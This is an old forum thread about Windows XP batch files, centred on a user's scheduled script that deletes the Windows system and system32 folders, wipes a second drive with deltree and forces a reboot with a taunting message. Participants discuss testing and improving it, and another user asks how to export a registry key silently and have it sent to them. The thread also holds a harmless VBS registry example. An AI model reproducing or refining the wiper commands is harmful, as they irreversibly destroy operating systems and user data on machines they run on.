DOS batch files

Status
Not open for further replies.
so im confused, how would you get windows to run the batch file?in a scheduled task?

ekÆsine said:
Inaris the shutdown is really just to display a message to scare the person. the damage has already been done before the shutdown starts, right after the computer is turned on or restarted it will display "hal corrupted,please reinstall hal."
What confuses me, is that you are deleting protected files without windows protection stopping you.
If I saw this pop up on my screen, I would stop it then start the repair process before you rebooted me. Besides, even if you ran this, a second install of an OS would be able to view all of the files left behind in the machine.

But you did good work. I for one, if I did ever steal a Computer (don't know why anyone would do this) would change local admin password, name and remove from any domain. Create other accounts all local and then start the data mining or whatever I had intended to do with the pilfered machine.

while testing different things i found that half the time there is nothing there to show that anything is happening other than the shutdown message at the end.

the other half winXP will display at the very end of deletion something like "windows xp has detected critical system files have been replaced with newer versions or overwritten. please insert to repair these files"

what is strange is it says "insert to repair" and does not even mention the name of what to insert. in fact it shows extra spaces where the name should be.

i have tried inserting the winXP CD and it tells me wrong volume. so i hit cancel, restart, and corrupt HAL. i have my partition ghosted if you were wondering why i can test these so easily.

-------
ADZ, yes under windows scheduled tasks. i think mike had an idea to include graphics, if you test it let me know if it works. and if you need pictures, i have 20,000 that would be useful :eek:

hehehehe. to be honest, i wouldnt know how to include it into an installation file. But if someone could assist...:D

Follow this link for a XP-compatable version of deltree
http://home.kooee.com.au/kingull/xp.html

ekÆsine said:
I am trying to make a batch file that will corrupt the operating system, delete all data on other drives, and reboot. this will be set to a date and time with windows task scheduler. here's what i have, not sure if the syntax is even correct:

cd c:\
del c:\WINDOWS\system\*.* /f/s/q
del c:\WINDOWS\system32\*.* /f/s/q
deltree /y d:\*.*
shutdown -r -t 10 -c "I Know Who You Are" -f

i cannot find a version of deltree for winXP. does anyone know of where i can download deltree or something similair for winXP?

and is there was a way to corrupt a partition, obviously with another program? all of this has to be done under winXP or have winXP launch the operation. i was thinking maybe partition magic could be controlled within a batch file to completely destroy a system, maybe?

I want to do all this in case one of my computers is compromised and i have no access to it. I also plan to have an IP updater program installed that would let me know the computer's IP at any time it has internet conection. I have heard you can trace someone based on IP address alone.

This is some interesting stuff, and a good idea. I, for the same reasons that have been mentioned, can't think of a way to do this. I had a question, and sorry this is off topic, but is it possible to export a registry key using a batch file? I'm sure I could open the registry.. in the background if needed, but how could I export it? My actual goal is to export a pre-defined key, and value, have it save somewhere with any name, and send to me... not sure how I would get it sent to me... but I've been tryin to do this for like 4 months now.. any idea?

MinDFreeZ,
I use Perl to access the registry as I have not found a way to do so anyother way with standard tools. Perl is pretty simple and keeps the code very small. For XP and 2000 you have to use Win32::TieRegistry for the module as things changed with them from previous versions.

umm...actually, Windows XP comes with a command line batch utility. reg.exe

go to a command prompt and type reg.exe and you'll see.

Also, there are other ways, easier ways, that are native to windows without having to install and learn Perl.

you can use WMI (which is available in Win98-2003) to create, read, and delete registry entries

This following example is a .vbs script that creates some keys (using wshshel.regwrite) then echo's (reads) the keys in a popup box (wshshell.regread), and then delete's them (wshshell.regdelete)

Dim WshShell, bKey
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\", 1, "REG_BINARY"
WshShell.RegWrite "HKCU\Software\ACME\FortuneTeller\MindReader", "Goocher!", "REG_SZ"

bKey = WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\")
WScript.Echo WshShell.RegRead("HKCU\Software\ACME\FortuneTeller\MindReader")

WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\MindReader"
WshShell.RegDelete "HKCU\Software\ACME\FortuneTeller\"
WshShell.RegDelete "HKCU\Software\ACME\"

if you want you can copy the above code into notepad and save it as "test.vbs" then run it.

Status
Not open for further replies.
Back
Top Bottom